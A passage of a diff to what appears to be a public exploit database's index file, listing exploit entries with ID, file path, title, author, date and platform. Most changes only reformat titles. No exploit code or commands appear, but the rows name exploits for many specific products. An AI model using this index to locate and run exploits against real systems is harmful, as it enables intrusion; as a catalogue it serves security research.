Vulnerability",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24026,platforms/php/webapps/24026.txt,"PHPBB 2.0.x album_portal.php Remote File Include Vulnerability",2004-04-19,Officerrr,php,webapps,0 -24027,platforms/linux/local/24027.txt,"UTempter 0.5.x Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 +24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 24028,platforms/windows/remote/24028.pl,"Kinesphere Corporation Exchange POP3 4.0/5.0 - Remote Buffer Overflow Vulnerability",2004-04-20,"securma massine",windows,remote,0 24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 LIST Parameter Buffer Overflow Vulnerability",2004-04-20,storm,windows,dos,0 24030,platforms/multiple/remote/24030.c,"Multiple Vendor TCP Sequence Number Approximation Vulnerability (1)",2004-03-05,"Matt Edman",multiple,remote,0 @@ -21202,7 +21202,7 @@ id,file,description,date,author,platform,type,port 24035,platforms/php/webapps/24035.txt,"phProfession 2.5 upload.php Direct Request Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 24036,platforms/php/webapps/24036.txt,"phProfession 2.5 modules.php jcode Parameter XSS",2004-04-23,"Janek Vind",php,webapps,0 24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 openwindow.php hlpfile Parameter XSS",2004-04-21,"Janek Vind",php,webapps,0 -24038,platforms/linux/remote/24038.txt,"Xine 0.9.x And Xine-Lib 1 Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 +24038,platforms/linux/remote/24038.txt,"Xine 0.9.x And Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 beta Database Disclosure Vulnerability",2004-04-22,CyberTal0n,asp,webapps,0 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection Vulnerability",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0 @@ -21229,8 +21229,8 @@ id,file,description,date,author,platform,type,port 24062,platforms/unix/local/24062.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (1)",2004-04-25,"Secure Network Operations",unix,local,0 24063,platforms/unix/local/24063.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (2)",2004-04-25,"Secure Network Operations",unix,local,0 24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0 -24065,platforms/hardware/remote/24065.java,"Siemens S55 Cellular Telephone SMS Confirmation Message Bypass Vulnerability",2004-04-27,FtR,hardware,remote,0 -24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 Remote Denial of Service Vulnerability",2004-04-27,"Donato Ferrante",multiple,dos,0 +24065,platforms/hardware/remote/24065.java,"Siemens S55 Cellular Telephone Sms Confirmation Message Bypass Vulnerability",2004-04-27,FtR,hardware,remote,0 +24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service Vulnerability",2004-04-27,"Donato Ferrante",multiple,dos,0 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow/Directory Traversal Vulnerabilities",2004-04-30,N4rK07IX,unix,remote,0 24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability",2004-04-30,"Alvin Alex",php,webapps,0 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing Vulnerability",2004-04-30,E.Kellinis,windows,remote,0 @@ -21247,7 +21247,7 @@ id,file,description,date,author,platform,type,port 24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service Vulnerability",2004-05-04,storm,windows,dos,0 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution Vulnerability",2004-05-05,"Stuart Jamieson",cfm,webapps,0 24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 Size Tag HTML Injection Vulnerability",2004-05-05,"Cheng Peng Su",php,webapps,0 -24083,platforms/php/webapps/24083.txt,"PHPX 3.x Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 +24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24084,platforms/multiple/remote/24084.py,"Nagios history.cgi Remote Command Execution Vulnerability",2013-01-13,blasty,multiple,remote,0 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 (go param) Open Redirect Vulnerability",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 Path Disclosure and Stored XSS Vulnerabilities",2013-01-13,LiquidWorm,php,webapps,0 @@ -21266,10 +21266,10 @@ id,file,description,date,author,platform,type,port 24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module modules.php jokeid Parameter SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 24101,platforms/windows/remote/24101.txt,"Microsoft Outlook 2003 Predictable File Location Weakness",2004-05-10,http-equiv,windows,remote,0 24102,platforms/windows/remote/24102.txt,"Microsoft Internet Explorer 4/5/6 Embedded Image URI Obfuscation Weakness",2004-05-10,http-equiv,windows,remote,0 -24103,platforms/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x Remote Heap Overflow Vulnerability",2004-05-09,"Behrang Fouladi",windows,dos,0 +24103,platforms/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow Vulnerability",2004-05-09,"Behrang Fouladi",windows,dos,0 24104,platforms/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple Remote SQL Injection Vulnerabilities",2004-05-10,"Hillel Himovich",php,webapps,0 24105,platforms/linux/remote/24105.txt,"National Science Foundation Squid Proxy 2.3 Internet Access Control Bypass Vulnerability",2004-05-10,"Nuno Costa",linux,remote,0 -24106,platforms/linux/remote/24106.txt,"Open WebMail 1.x/2.x Remote Command Execution Variant Vulnerability",2004-05-10,Nullbyte,linux,remote,0 +24106,platforms/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant Vulnerability",2004-05-10,Nullbyte,linux,remote,0 24107,platforms/windows/dos/24107.pl,"EMule Web 0.42 Control Panel Denial of Service Vulnerability",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 24108,platforms/php/webapps/24108.txt,"CMS phpshop 2.0 - SQL Injection Vulnerability",2013-01-14,"By onestree",php,webapps,0 24110,platforms/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service Vulnerability",2013-01-14,"Julien Ahrens",windows,dos,0 @@ -21282,7 +21282,7 @@ id,file,description,date,author,platform,type,port 24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability",2004-05-13,http-equiv,windows,remote,0 24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability",2004-05-14,"Mike Mauler",windows,dos,0 -24120,platforms/linux/remote/24120.c,"LHA 1.x Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 +24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OS X 10.3.x Help Protocol Remote Code Execution Vulnerability",2004-05-17,"Troels Bay",osx,remote,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24123,platforms/linux/local/24123.sh,"WGet 1.x Insecure File Creation Race Condition Vulnerability",2004-05-17,"Hugo Vazquez",linux,local,0 @@ -21293,7 +21293,7 @@ id,file,description,date,author,platform,type,port 24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x,Cygwin 1.5.x System Function Call Buffer Overflow Vulnerability",2004-05-18,"Oliver Karow",windows,dos,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow Vulnerability",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x,Larry Wall Perl 5.x Duplication Operator Integer Overflow Vulnerability",2004-05-18,"Matt Murphy",multiple,dos,0 -24131,platforms/php/webapps/24131.txt,"dsm light web file browser 2.0 - Directory Traversal vulnerability",2004-05-18,Humberto,php,webapps,0 +24131,platforms/php/webapps/24131.txt,"dsm light web file browser 2.0 - Directory Traversal Vulnerability",2004-05-18,Humberto,php,webapps,0 24133,platforms/windows/remote/24133.rb,"Freesshd Authentication Bypass",2013-01-15,metasploit,windows,remote,0 24134,platforms/php/webapps/24134.txt,"CMS snews SQL Injection Vulnerability",2013-01-15,"By onestree",php,webapps,0 24135,platforms/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability",2004-05-18,henkie_is_leet,windows,dos,0 @@ -21341,7 +21341,7 @@ id,file,description,date,author,platform,type,port 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure Vulnerability",2004-06-08,"Vickenty Fesunov",linux,remote,0 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 24181,platforms/openbsd/remote/24181.sh,"OpenBSD 3.x ISAKMPD Security Association Piggyback Delete Payload Denial of Service Vulnerability",2004-06-08,"Thomas Walpuski",openbsd,remote,0 -24182,platforms/linux/local/24182.c,"CVS 1.11.x Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 +24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd Remote SQL Injection Vulnerability",2004-06-09,verb0s@virtualnova.net,php,webapps,0 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 Access Validation Vulnerability",2004-06-09,"Thomas Ryan",asp,webapps,0 24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 ReturnURL Parameter Cross-Site Scripting Vulnerability",2004-06-09,"Thomas Ryan",asp,webapps,0 @@ -21363,7 +21363,7 @@ id,file,description,date,author,platform,type,port 24201,platforms/php/webapps/24201.txt,"php-Charts Arbitrary PHP Code Execution Vulnerability",2013-01-18,AkaStep,php,webapps,0 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 -24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 +24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24205,platforms/linux/remote/24205.txt,"Novell NCP Pre-Auth Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console Command Execution MSF Module",2013-01-18,"Spencer McIntyre",multiple,remote,0 24207,platforms/windows/local/24207.c,"NVidia Display Driver Service (Nsvr) Exploit",2013-01-18,"Jon Bailey",windows,local,0 @@ -21374,13 +21374,13 @@ id,file,description,date,author,platform,type,port 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.PHP File Include Vulnerability",2004-06-15,loofus,php,webapps,0 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability",2004-06-15,"bitlance winter",windows,remote,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability",2004-06-15,"Ferruh Mavituna",asp,webapps,0 -24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 +24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 usersL.php3 - Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 edituser.php3 do_not_login Variable Authentication Bypass",2004-06-15,HEX,php,webapps,0 24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24218,platforms/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 DNSD DNS Cache Poisoning Vulnerability",2004-06-15,fryxar,windows,remote,0 24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 ActiveX Control Dangerous Method Vulnerability",2004-06-16,"eEye Digital Security Team",windows,remote,0 24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 ActiveX Control Dangerous Method Vulnerability",2004-06-01,"eEye Digital Security Team",windows,remote,0 -24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 +24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0 24223,platforms/linux/remote/24223.py,"Rlpr 2.0 msg() Function Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 Authentication Handling Buffer Overflow Vulnerability",2004-06-04,"Nilanjan De",multiple,remote,0 @@ -21391,7 +21391,7 @@ id,file,description,date,author,platform,type,port 24229,platforms/php/webapps/24229.txt,"Wordpress plugin Ripe HD FLV Player SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router SNMP Community String Information Disclosure Vulnerability",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 Cross-Site Scripting Vulnerability",2004-06-22,"Josh Gilmour",php,webapps,0 -24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 +24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service Vulnerability",2004-06-23,"Marceta Milos",freebsd,dos,0 24234,platforms/php/webapps/24234.html,"VBulletin 3.0.1 newreply.php WYSIWYG_HTML Parameter XSS",2004-06-24,"Cheng Peng Su",php,webapps,0 24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass Vulnerability",2004-06-24,GaMeS,php,webapps,0 @@ -21406,19 +21406,19 @@ id,file,description,date,author,platform,type,port 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 Management Interface XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 Cross-Site Scripting Vulnerability",2004-07-20,"Donato Ferrante",multiple,remote,0 -24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 +24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 Denial of Service Vulnerability",2004-07-02,"Leandro Meiners",unix,dos,0 24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness",2004-07-03,http-equiv,windows,remote,0 24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 Authentication Bypass Vulnerability",2004-07-05,"Eli Kara",multiple,remote,0 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 Unauthorized Message Disclosure Vulnerability",2004-07-05,"Thomas Springer",cgi,webapps,0 -24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal vulnerability",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 +24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal Vulnerability",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 Cross-Site Scripting Vulnerability",2004-07-05,"Donato Ferrante",multiple,remote,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 Email Header HTML Injection Vulnerability",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 index.php action Parameter XSS",2004-07-06,"Fernando Quintero",php,webapps,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability",2013-01-20,LiquidWorm,windows,local,0 -24259,platforms/linux/remote/24259.c,"Ethereal 0.x Multiple Unspecified iSNS, SMB and SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 +24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS, SMB and SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 comersus_message.asp XSS",2004-07-07,"Thomas Ryan",asp,webapps,0 24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x IFrame OnLoad Address Bar URL Obfuscation Weakness",2004-07-08,"bitlance winter",windows,remote,0 @@ -21437,7 +21437,7 @@ id,file,description,date,author,platform,type,port 24276,platforms/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote,0 24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability",2004-07-16,bkbll,windows,local,0 24278,platforms/linux/local/24278.sh,"IM-Switch Insecure Temporary File Handling Symbolic Link Vulnerability",2004-07-13,"SEKINE Tatsuo",linux,local,0 -24279,platforms/php/webapps/24279.txt,"Moodle Help Script 1.x Cross Site Scripting Vulnerability",2004-07-13,morpheus[bd],php,webapps,0 +24279,platforms/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross Site Scripting Vulnerability",2004-07-13,morpheus[bd],php,webapps,0 24280,platforms/php/remote/24280.txt,"PHP 4.x/5.0 Strip_Tags() Function Bypass Vulnerability",2004-07-14,"Stefan Esser",php,remote,0 24281,platforms/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service Vulnerability",2004-07-14,HexView,windows,dos,0 24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 web.tmpl Language Variable CPU Consumption DoS",2004-07-15,dr_insane,multiple,dos,0 @@ -21449,7 +21449,7 @@ id,file,description,date,author,platform,type,port 24288,platforms/windows/dos/24288.txt,"Symantec Norton Antivirus 2001/2002/2003/2004 Script Blocker Denial of Service Vulnerability",2004-07-16,vozzie,windows,dos,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability",2004-07-19,"Adam Simuntis",php,webapps,0 24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 Comment HTML Injection Vulnerability",2004-07-19,DarkBicho,php,webapps,0 -24291,platforms/php/webapps/24291.txt,"Outblaze Webmail 0 HTML Injection Vulnerability",2004-07-19,DarkBicho,php,webapps,0 +24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection Vulnerability",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection Vulnerability",2004-07-19,"Bartek Nowotarski",php,webapps,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 24294,platforms/php/webapps/24294.txt,"Wordpress Developer Formatter CSRF Vulnerability",2013-01-22,"Junaid Hussain",php,webapps,0 @@ -21480,7 +21480,7 @@ id,file,description,date,author,platform,type,port 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0 24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 -24322,platforms/multiple/remote/24322.rb,"SonicWALL GMS 6 Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 +24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0 24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness",2004-07-27,"bitlance winter",multiple,remote,0 @@ -21508,21 +21508,21 @@ id,file,description,date,author,platform,type,port 24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution Vulnerability",2004-08-04,"Francisco Alisson",cgi,webapps,0 24348,platforms/php/webapps/24348.txt,"eNdonesia 8.3 Search Form Cross-Site Scripting Vulnerability",2004-08-04,"Ahmad Muammar",php,webapps,0 24349,platforms/php/webapps/24349.txt,"PHP-Nuke 0-7 Delete God Admin Access Control Bypass Vulnerability",2004-08-04,"Ahmad Muammar",php,webapps,0 -24350,platforms/windows/remote/24350.txt,"acme thttpd 2.0.7 - Directory Traversal vulnerability",2004-08-04,CoolICE,windows,remote,0 +24350,platforms/windows/remote/24350.txt,"acme thttpd 2.0.7 - Directory Traversal Vulnerability",2004-08-04,CoolICE,windows,remote,0 24351,platforms/multiple/dos/24351.c,"Free Web Chat Initial Release UserManager.java Null Pointer DoS",2004-08-04,"Donato Ferrante",multiple,dos,0 24352,platforms/multiple/dos/24352.java,"Free Web Chat Initial Release Connection Saturation DoS",2004-08-04,"Donato Ferrante",multiple,dos,0 24353,platforms/unix/remote/24353.sql,"Oracle 9i Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6.0 mms Protocol Handler Executable Command Line Injection Vulnerability",2004-08-05,"Nicolas Robillard",windows,remote,0 24355,platforms/linux/dos/24355.txt,"GNU Info 4.7 Follow XRef Buffer Overrun Vulnerability",2004-08-06,"Josh Martin",linux,dos,0 -24356,platforms/php/webapps/24356.txt,"Moodle 1.x 'post.php' Cross-Site Scripting Vulnerability",2004-08-16,"Javier Ubilla",php,webapps,0 +24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting Vulnerability",2004-08-16,"Javier Ubilla",php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.PHP Cross-Site Scripting Vulnerability",2004-08-07,"befcake beefy",php,webapps,0 -24358,platforms/linux/dos/24358.txt,"Xine-Lib 0.99 Remote Buffer Overflow Vulnerability",2004-07-08,c0ntex,linux,dos,0 -24359,platforms/php/webapps/24359.php,"YaPiG 0.92 Remote Server-Side Script Execution Vulnerability",2004-07-07,aCiDBiTS,php,webapps,0 +24358,platforms/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow Vulnerability",2004-07-08,c0ntex,linux,dos,0 +24359,platforms/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution Vulnerability",2004-07-07,aCiDBiTS,php,webapps,0 24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (2)",2004-08-09,jsk,linux,remote,0 24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 Firewall.INI Local Buffer Overrun Vulnerability",2004-08-11,"Paul Craig",windows,dos,0 -24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for web 4.0/5.0 - Directory Traversal vulnerability",2004-07-11,"Kroma Pierre",windows,remote,0 -24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 CSRF Vulnerability",2013-01-25,"Junaid Hussain",php,webapps,0 +24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for web 4.0/5.0 - Directory Traversal Vulnerability",2004-07-11,"Kroma Pierre",windows,remote,0 +24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 - CSRF Vulnerability",2013-01-25,"Junaid Hussain",php,webapps,0 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 24366,platforms/windows/local/24366.rb,"Windows Manage Memory Payload Injection",2013-01-25,metasploit,windows,local,0 24367,platforms/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps,0 @@ -21544,35 +21544,35 @@ id,file,description,date,author,platform,type,port 24383,platforms/php/webapps/24383.php,"Gallery 1.4.4 - Remote Server-Side Script Execution Vulnerability",2004-07-17,aCiDBiTS,php,webapps,0 24384,platforms/php/webapps/24384.txt,"PHP-Fusion Database Backup Information Disclosure Vulnerability",2004-07-18,"Ahmad Muammar",php,webapps,0 24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure Vulnerability",2004-07-19,"Security .Net Information",asp,webapps,0 -24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA 0 Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0 +24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0 24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability",2004-08-20,"Audun Larsen",multiple,remote,0 24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0 24389,platforms/php/webapps/24389.txt,"Sympa 4.x New List HTML Injection Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 -24390,platforms/php/webapps/24390.txt,"Mantis 0.19 Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 